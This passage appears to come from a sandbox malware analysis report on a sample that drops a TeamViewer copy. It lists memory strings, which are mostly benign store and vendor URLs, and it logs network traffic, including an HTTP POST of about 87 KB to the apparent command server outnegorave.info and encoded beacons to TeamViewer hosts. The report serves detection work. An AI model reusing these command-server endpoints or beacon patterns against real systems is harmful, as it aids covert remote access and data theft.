peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/6
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/70
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/87096&p=10000001
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/s
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/x
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/allControlPanel.dll
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 87812 Content-Type: multipart/form-data; boundary=--------2771230636 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: outnegorave.info Connection: Close Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335540 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoA,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_6F335540
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
